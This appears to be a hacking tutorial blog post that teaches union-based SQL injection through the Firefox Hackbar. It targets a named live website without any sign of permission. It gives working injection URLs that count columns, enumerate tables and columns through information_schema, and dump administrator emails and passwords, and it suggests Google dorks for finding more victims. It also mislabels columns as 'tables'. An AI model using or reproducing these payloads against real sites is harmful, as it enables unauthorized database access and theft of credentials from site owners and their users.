How to Hack a Website with SQL Injection (from Firefox)

Today I Am Going to show you how to hack a website with sql injection So Lets Start
    
   You Can Find Thousands For vulnerable websites using google dorks
    
Requirements:
                 
                   Vulnerable Website

                   Firefox Browser
         
                    Hackbar (it is a firefox extension it should be installed in firefox browser)

==> I have vulnerable website
    
http://www.morephotosradio.com/transcript.php?interview_id=2021

To Check This website is vulnerable or not put ' sign in the end of link Like

==>http://www.morephotosradio.com/transcript.php?interview_id=2021'

The Page Will Show sqli error Like This

==> Find Number of tables by using order by --+ Query Like This


http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 1--+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 7--+ No Error


http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 15--+ No Error


http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 30--+ No Error


http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45--+ No Error


http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47--+  Error

==> This Error shows that the website have 46 number of tables

==> Now Remove order by and go to UNION Based In Hackbar And Click On union+all+select -statement

==>A Small Box Will OPen In that box type the number of tables like of this website is 46

==> Also Place - Sign before parameter id like this (id=-2021)





==>Press Execuate Some Numbers will be shown on page Like You Can See In The Image Above Replace any one number by group_concat(table_name) and

write from information_schema.tables where table_schema=database()--+ in the end of url

For Finding Table Information

  http://www.morephotosradio.com/transcript.php?interview_id=-2021 UNION SELECT
1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+information_schema.tables+where+table_schema=database()--+


==> The Page Will Show All Table Names We Want To Hack website so we need to find admin username and password

==> Now Remove database() From The query and go to sql basics then char() and then mysqlchar a small window will open

==>In That Window Type tables like admin user member i will type user because my admin table name is user

==>Click Ok Now Replace the following things of query

group_concat(table_name) to group_concat(column_name)

table_schema to table_name

information_schema.tables to information_schema.columns

the database() is already removed and mysql char of user is placed in the place of user

==> The Query For Columns Will Become Like This

http://www.morephotosradio.com/transcript.php?interview_id=-2021+UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.columns where table_name=CHAR(117, 115, 101, 114)--+



Press Execuate

==> Now We Need Admin Email And Passwords

replace column_name with any column name you  need like email amd password and in the end of url write from user like this


http://www.morephotosradio.com/transcript.php?interview_id=-2021+UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from user--+

Press Execuate


You Can See That We GOt All Emails And Passwords

Comments